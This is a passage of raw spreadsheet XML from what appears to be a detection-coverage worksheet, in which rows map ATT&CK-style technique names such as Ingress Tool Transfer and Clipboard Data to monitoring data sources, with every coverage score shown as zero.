      <c r="A102" s="43" t="s">
        <v>199</v>
      </c>
      <c r="B102" s="41" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:B)</f>
        <v>SSH Authorized Keys</v>
      </c>
      <c r="C102" s="45"/>
      <c r="D102" s="45"/>
      <c r="E102" s="45"/>
      <c r="F102" s="14">
        <v>0</v>
      </c>
      <c r="G102" s="14">
        <v>0</v>
      </c>
      <c r="H102" s="14">
        <v>0</v>
      </c>
      <c r="I102" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K102" s="46" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="103" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A103" s="43" t="s">
        <v>200</v>
      </c>
      <c r="B103" s="41" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:B)</f>
        <v>Web Service</v>
      </c>
      <c r="C103" s="45"/>
      <c r="D103" s="45"/>
      <c r="E103" s="45"/>
      <c r="F103" s="14">
        <v>0</v>
      </c>
      <c r="G103" s="14">
        <v>0</v>
      </c>
      <c r="H103" s="14">
        <v>0</v>
      </c>
      <c r="I103" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K103" s="46" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
    </row>
    <row r="104" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A104" s="43" t="s">
        <v>202</v>
      </c>
      <c r="B104" s="41" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:B)</f>
        <v>One-Way Communication</v>
      </c>
      <c r="C104" s="45"/>
      <c r="D104" s="45"/>
      <c r="E104" s="45"/>
      <c r="F104" s="14">
        <v>0</v>
      </c>
      <c r="G104" s="14">
        <v>0</v>
      </c>
      <c r="H104" s="14">
        <v>0</v>
      </c>
      <c r="I104" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K104" s="46" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
    </row>
    <row r="105" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A105" s="43" t="s">
        <v>203</v>
      </c>
      <c r="B105" s="41" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:B)</f>
        <v>Multi-Stage Channels</v>
      </c>
      <c r="C105" s="45"/>
      <c r="D105" s="45"/>
      <c r="E105" s="45"/>
      <c r="F105" s="14">
        <v>0</v>
      </c>
      <c r="G105" s="14">
        <v>0</v>
      </c>
      <c r="H105" s="14">
        <v>0</v>
      </c>
      <c r="I105" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K105" s="46" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
    </row>
    <row r="106" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A106" s="43" t="s">
        <v>205</v>
      </c>
      <c r="B106" s="41" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:B)</f>
        <v>Ingress Tool Transfer</v>
      </c>
      <c r="C106" s="45"/>
      <c r="D106" s="45"/>
      <c r="E106" s="45"/>
      <c r="F106" s="14">
        <v>0</v>
      </c>
      <c r="G106" s="14">
        <v>0</v>
      </c>
      <c r="H106" s="14">
        <v>0</v>
      </c>
      <c r="I106" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K106" s="46" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
    </row>
    <row r="107" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A107" s="43" t="s">
        <v>207</v>
      </c>
      <c r="B107" s="41" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:B)</f>
        <v>Native API</v>
      </c>
      <c r="C107" s="45"/>
      <c r="D107" s="45"/>
      <c r="E107" s="45"/>
      <c r="F107" s="14">
        <v>0</v>
      </c>
      <c r="G107" s="14">
        <v>0</v>
      </c>
      <c r="H107" s="14">
        <v>0</v>
      </c>
      <c r="I107" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K107" s="46" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:C)</f>
        <v>System calls,Loaded DLLs,API monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="108" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A108" s="43" t="s">
        <v>208</v>
      </c>
      <c r="B108" s="41" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:B)</f>
        <v>Native API</v>
      </c>
      <c r="C108" s="45"/>
      <c r="D108" s="45"/>
      <c r="E108" s="45"/>
      <c r="F108" s="14">
        <v>0</v>
      </c>
      <c r="G108" s="14">
        <v>0</v>
      </c>
      <c r="H108" s="14">
        <v>0</v>
      </c>
      <c r="I108" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K108" s="46" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:C)</f>
        <v>System calls,Loaded DLLs,API monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="109" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A109" s="43" t="s">
        <v>210</v>
      </c>
      <c r="B109" s="41" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:B)</f>
        <v>Redundant Access</v>
      </c>
      <c r="C109" s="45"/>
      <c r="D109" s="45"/>
      <c r="E109" s="45"/>
      <c r="F109" s="14">
        <v>0</v>
      </c>
      <c r="G109" s="14">
        <v>0</v>
      </c>
      <c r="H109" s="14">
        <v>0</v>
      </c>
      <c r="I109" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K109" s="46" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
    </row>
    <row r="110" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A110" s="43" t="s">
        <v>212</v>
      </c>
      <c r="B110" s="41" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:B)</f>
        <v>Redundant Access</v>
      </c>
      <c r="C110" s="45"/>
      <c r="D110" s="45"/>
      <c r="E110" s="45"/>
      <c r="F110" s="14">
        <v>0</v>
      </c>
      <c r="G110" s="14">
        <v>0</v>
      </c>
      <c r="H110" s="14">
        <v>0</v>
      </c>
      <c r="I110" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K110" s="46" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
    </row>
    <row r="111" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A111" s="43" t="s">
        <v>214</v>
      </c>
      <c r="B111" s="41" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:B)</f>
        <v>Brute Force</v>
      </c>
      <c r="C111" s="45"/>
      <c r="D111" s="45"/>
      <c r="E111" s="45"/>
      <c r="F111" s="14">
        <v>0</v>
      </c>
      <c r="G111" s="14">
        <v>0</v>
      </c>
      <c r="H111" s="14">
        <v>0</v>
      </c>
      <c r="I111" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K111" s="46" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Authentication logs</v>
      </c>
    </row>
    <row r="112" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A112" s="43" t="s">
        <v>215</v>
      </c>
      <c r="B112" s="41" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:B)</f>
        <v>Two-Factor Authentication Interception</v>
      </c>
      <c r="C112" s="45"/>
      <c r="D112" s="45"/>
      <c r="E112" s="45"/>
      <c r="F112" s="14">
        <v>0</v>
      </c>
      <c r="G112" s="14">
        <v>0</v>
      </c>
      <c r="H112" s="14">
        <v>0</v>
      </c>
      <c r="I112" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K112" s="46" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Kernel drivers</v>
      </c>
    </row>
    <row r="113" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A113" s="43" t="s">
        <v>216</v>
      </c>
      <c r="B113" s="41" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:B)</f>
        <v>Modify Registry</v>
      </c>
      <c r="C113" s="45"/>
      <c r="D113" s="45"/>
      <c r="E113" s="45"/>
      <c r="F113" s="14">
        <v>0</v>
      </c>
      <c r="G113" s="14">
        <v>0</v>
      </c>
      <c r="H113" s="14">
        <v>0</v>
      </c>
      <c r="I113" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K113" s="46" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
    </row>
    <row r="114" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A114" s="43" t="s">
        <v>218</v>
      </c>
      <c r="B114" s="41" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:B)</f>
        <v>Screen Capture</v>
      </c>
      <c r="C114" s="45"/>
      <c r="D114" s="45"/>
      <c r="E114" s="45"/>
      <c r="F114" s="14">
        <v>0</v>
      </c>
      <c r="G114" s="14">
        <v>0</v>
      </c>
      <c r="H114" s="14">
        <v>0</v>
      </c>
      <c r="I114" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K114" s="46" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="115" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A115" s="43" t="s">
        <v>220</v>
      </c>
      <c r="B115" s="41" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:B)</f>
        <v>Email Collection</v>
      </c>
      <c r="C115" s="45"/>
      <c r="D115" s="45"/>
      <c r="E115" s="45"/>
      <c r="F115" s="14">
        <v>0</v>
      </c>
      <c r="G115" s="14">
        <v>0</v>
      </c>
      <c r="H115" s="14">
        <v>0</v>
      </c>
      <c r="I115" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K115" s="46" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:C)</f>
        <v>Office 365 trace logs,Mail server,Email gateway,Authentication logs,File monitoring,Process monitoring,Process use of network</v>
      </c>
    </row>
    <row r="116" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A116" s="43" t="s">
        <v>222</v>
      </c>
      <c r="B116" s="41" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C116" s="45"/>
      <c r="D116" s="45"/>
      <c r="E116" s="45"/>
      <c r="F116" s="14">
        <v>0</v>
      </c>
      <c r="G116" s="14">
        <v>0</v>
      </c>
      <c r="H116" s="14">
        <v>0</v>
      </c>
      <c r="I116" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K116" s="46" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
    </row>
    <row r="117" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A117" s="43" t="s">
        <v>223</v>
      </c>
      <c r="B117" s="41" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C117" s="45"/>
      <c r="D117" s="45"/>
      <c r="E117" s="45"/>
      <c r="F117" s="14">
        <v>0</v>
      </c>
      <c r="G117" s="14">
        <v>0</v>
      </c>
      <c r="H117" s="14">
        <v>0</v>
      </c>
      <c r="I117" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K117" s="46" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
    </row>
    <row r="118" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A118" s="43" t="s">
        <v>224</v>
      </c>
      <c r="B118" s="41" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C118" s="45"/>
      <c r="D118" s="45"/>
      <c r="E118" s="45"/>
      <c r="F118" s="14">
        <v>0</v>
      </c>
      <c r="G118" s="14">
        <v>0</v>
      </c>
      <c r="H118" s="14">
        <v>0</v>
      </c>
      <c r="I118" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K118" s="46" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
    </row>
    <row r="119" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A119" s="43" t="s">
        <v>225</v>
      </c>
      <c r="B119" s="41" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C119" s="45"/>
      <c r="D119" s="45"/>
      <c r="E119" s="45"/>
      <c r="F119" s="14">
        <v>0</v>
      </c>
      <c r="G119" s="14">
        <v>0</v>
      </c>
      <c r="H119" s="14">
        <v>0</v>
      </c>
      <c r="I119" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K119" s="46" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
    </row>
    <row r="120" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A120" s="43" t="s">
        <v>226</v>
      </c>
      <c r="B120" s="41" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:B)</f>
        <v>Automated Collection</v>
      </c>
      <c r="C120" s="45"/>
      <c r="D120" s="45"/>
      <c r="E120" s="45"/>
      <c r="F120" s="14">
        <v>0</v>
      </c>
      <c r="G120" s="14">
        <v>0</v>
      </c>
      <c r="H120" s="14">
        <v>0</v>
      </c>
      <c r="I120" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K120" s="46" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention,Process command-line parameters</v>
      </c>
    </row>
    <row r="121" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A121" s="43" t="s">
        <v>227</v>
      </c>
      <c r="B121" s="41" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
      <c r="C121" s="45"/>
      <c r="D121" s="45"/>
      <c r="E121" s="45"/>
      <c r="F121" s="14">
        <v>0</v>
      </c>
      <c r="G121" s="14">
        <v>0</v>
      </c>
      <c r="H121" s="14">
        <v>0</v>
      </c>
      <c r="I121" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K121" s="46" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="122" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A122" s="43" t="s">
        <v>228</v>
      </c>
      <c r="B122" s="41" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
      <c r="C122" s="45"/>
      <c r="D122" s="45"/>
      <c r="E122" s="45"/>
      <c r="F122" s="14">
        <v>0</v>
      </c>
      <c r="G122" s="14">
        <v>0</v>
      </c>
      <c r="H122" s="14">
        <v>0</v>
      </c>
      <c r="I122" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K122" s="46" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="123" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A123" s="43" t="s">
        <v>229</v>
      </c>
      <c r="B123" s="41" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
      <c r="C123" s="45"/>
      <c r="D123" s="45"/>
      <c r="E123" s="45"/>
      <c r="F123" s="14">
        <v>0</v>
      </c>
      <c r="G123" s="14">
        <v>0</v>
      </c>
      <c r="H123" s="14">
        <v>0</v>
      </c>
      <c r="I123" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K123" s="46" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="124" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A124" s="43" t="s">
        <v>231</v>
      </c>
      <c r="B124" s="41" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:B)</f>
        <v>Audio Capture</v>
      </c>
      <c r="C124" s="45"/>
      <c r="D124" s="45"/>
      <c r="E124" s="45"/>
      <c r="F124" s="14">
        <v>0</v>
      </c>
      <c r="G124" s="14">
        <v>0</v>
      </c>
      <c r="H124" s="14">
        <v>0</v>
      </c>
      <c r="I124" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K124" s="46" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="125" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A125" s="43" t="s">
        <v>232</v>
      </c>
      <c r="B125" s="41" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:B)</f>
        <v>System Time Discovery</v>
      </c>
      <c r="C125" s="45"/>
      <c r="D125" s="45"/>
      <c r="E125" s="45"/>
      <c r="F125" s="14">
        <v>0</v>
      </c>
      <c r="G125" s="14">
        <v>0</v>
      </c>
      <c r="H125" s="14">
        <v>0</v>
      </c>
      <c r="I125" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K125" s="46" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,API monitoring</v>
      </c>
    </row>
    <row r="126" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A126" s="43" t="s">
        <v>233</v>
      </c>
      <c r="B126" s="41" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:B)</f>
        <v>Video Capture</v>
      </c>
      <c r="C126" s="45"/>
      <c r="D126" s="45"/>
      <c r="E126" s="45"/>
      <c r="F126" s="14">
        <v>0</v>
      </c>
      <c r="G126" s="14">
        <v>0</v>
      </c>
      <c r="H126" s="14">
        <v>0</v>
      </c>
      <c r="I126" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K126" s="46" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
    </row>
    <row r="127" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A127" s="43" t="s">
        <v>234</v>
      </c>
      <c r="B127" s="41" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:B)</f>
        <v>Video Capture</v>
      </c>
      <c r="C127" s="45"/>
      <c r="D127" s="45"/>
      <c r="E127" s="45"/>
      <c r="F127" s="14">
        <v>0</v>
      </c>
      <c r="G127" s="14">
        <v>0</v>
      </c>
      <c r="H127" s="14">
        <v>0</v>
      </c>
      <c r="I127" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K127" s="46" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
    </row>
    <row r="128" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A128" s="43" t="s">
        <v>236</v>
      </c>
      <c r="B128" s="41" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:B)</f>
        <v>Trusted Developer Utilities Proxy Execution</v>
      </c>
      <c r="C128" s="45"/>
      <c r="D128" s="45"/>
      <c r="E128" s="45"/>
      <c r="F128" s="14">
        <v>0</v>
      </c>
      <c r="G128" s="14">
        <v>0</v>
      </c>
      <c r="H128" s="14">
        <v>0</v>
      </c>
      <c r="I128" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K128" s="46" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="129" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A129" s="43" t="s">
        <v>237</v>
      </c>
      <c r="B129" s="41" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:B)</f>
        <v>MSBuild</v>
      </c>
      <c r="C129" s="45"/>
      <c r="D129" s="45"/>
      <c r="E129" s="45"/>
      <c r="F129" s="14">
        <v>0</v>
      </c>
      <c r="G129" s="14">
        <v>0</v>
      </c>
      <c r="H129" s="14">
        <v>0</v>
      </c>
      <c r="I129" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K129" s="46" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
    </row>
    <row r="130" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A130" s="43" t="s">
        <v>238</v>
      </c>
      <c r="B130" s="41" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:B)</f>
        <v>Shared Modules</v>
      </c>
      <c r="C130" s="45"/>
      <c r="D130" s="45"/>
      <c r="E130" s="45"/>
      <c r="F130" s="14">
        <v>0</v>
      </c>
      <c r="G130" s="14">
        <v>0</v>
      </c>
      <c r="H130" s="14">
        <v>0</v>
      </c>
      <c r="I130" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K130" s="46" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="131" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A131" s="43" t="s">
        <v>240</v>
      </c>
      <c r="B131" s="41" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:B)</f>
        <v>Shared Modules</v>
      </c>
      <c r="C131" s="45"/>
      <c r="D131" s="45"/>
      <c r="E131" s="45"/>
      <c r="F131" s="14">
        <v>0</v>
      </c>
      <c r="G131" s="14">
        <v>0</v>
      </c>
      <c r="H131" s="14">
        <v>0</v>
      </c>
      <c r="I131" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K131" s="46" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="132" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A132" s="43" t="s">
        <v>241</v>
      </c>
      <c r="B132" s="41" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:B)</f>
        <v>Shared Modules</v>
      </c>
      <c r="C132" s="45"/>
      <c r="D132" s="45"/>
      <c r="E132" s="45"/>
      <c r="F132" s="14">
        <v>0</v>
      </c>
      <c r="G132" s="14">
        <v>0</v>
      </c>
      <c r="H132" s="14">
        <v>0</v>
      </c>
      <c r="I132" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K132" s="46" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="133" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A133" s="43" t="s">
        <v>242</v>
      </c>
      <c r="B133" s="41" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:B)</f>
        <v>Data Encoding</v>
      </c>
      <c r="C133" s="45"/>
      <c r="D133" s="45"/>
      <c r="E133" s="45"/>
      <c r="F133" s="14">
        <v>0</v>
      </c>
      <c r="G133" s="14">
        <v>0</v>
      </c>
      <c r="H133" s="14">
        <v>0</v>
      </c>
      <c r="I133" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K133" s="46" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
    </row>
    <row r="134" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A134" s="43" t="s">
        <v>243</v>
      </c>
      <c r="B134" s="41" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:B)</f>
        <v>External Remote Services</v>
      </c>
      <c r="C134" s="45"/>
      <c r="D134" s="45"/>
      <c r="E134" s="45"/>
      <c r="F134" s="14">
        <v>0</v>
      </c>
      <c r="G134" s="14">
        <v>0</v>
      </c>
      <c r="H134" s="14">
        <v>0</v>
      </c>
      <c r="I134" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K134" s="46" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
    </row>
    <row r="135" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A135" s="43" t="s">
        <v>244</v>
      </c>
      <c r="B135" s="41" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:B)</f>
        <v>Access Token Manipulation</v>
      </c>
      <c r="C135" s="45"/>
      <c r="D135" s="45"/>
      <c r="E135" s="45"/>
      <c r="F135" s="14">
        <v>0</v>
      </c>
      <c r="G135" s="14">
        <v>0</v>
      </c>
      <c r="H135" s="14">
        <v>0</v>
      </c>
      <c r="I135" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K135" s="46" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs,API monitoring,Access tokens,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="136" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A136" s="43" t="s">
        <v>245</v>
      </c>
      <c r="B136" s="41" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:B)</f>
        <v>Network Share Discovery</v>
      </c>
      <c r="C136" s="45"/>
      <c r="D136" s="45"/>
      <c r="E136" s="45"/>
      <c r="F136" s="14">
        <v>0</v>
      </c>
      <c r="G136" s="14">
        <v>0</v>
      </c>
      <c r="H136" s="14">
        <v>0</v>
      </c>
      <c r="I136" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K136" s="46" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</v>
      </c>
    </row>
    <row r="137" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A137" s="43" t="s">
        <v>246</v>
      </c>
      <c r="B137" s="41" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:B)</f>
        <v>Create Account</v>
      </c>
      <c r="C137" s="45"/>
      <c r="D137" s="45"/>
      <c r="E137" s="45"/>
      <c r="F137" s="14">
        <v>0</v>
      </c>
      <c r="G137" s="14">
        <v>0</v>
      </c>
      <c r="H137" s="14">
        <v>0</v>
      </c>
      <c r="I137" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K137" s="46" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
    </row>
    <row r="138" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A138" s="43" t="s">
        <v>248</v>
      </c>
      <c r="B138" s="41" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:B)</f>
        <v>Office Application Startup</v>
      </c>
      <c r="C138" s="45"/>
      <c r="D138" s="45"/>
      <c r="E138" s="45"/>
      <c r="F138" s="14">
        <v>0</v>
      </c>
      <c r="G138" s="14">
        <v>0</v>
      </c>
      <c r="H138" s="14">
        <v>0</v>
      </c>
      <c r="I138" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K138" s="46" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:C)</f>
        <v>Mail server,Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
      </c>
    </row>
    <row r="139" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A139" s="43" t="s">
        <v>249</v>
      </c>
      <c r="B139" s="41" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:B)</f>
        <v>Add-ins</v>
      </c>
      <c r="C139" s="45"/>
      <c r="D139" s="45"/>
      <c r="E139" s="45"/>
      <c r="F139" s="14">
        <v>0</v>
      </c>
      <c r="G139" s="14">
        <v>0</v>
      </c>
      <c r="H139" s="14">
        <v>0</v>
      </c>
      <c r="I139" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K139" s="46" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Windows Registry,Process monitoring</v>
      </c>
    </row>
    <row r="140" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A140" s="43" t="s">
        <v>250</v>
      </c>
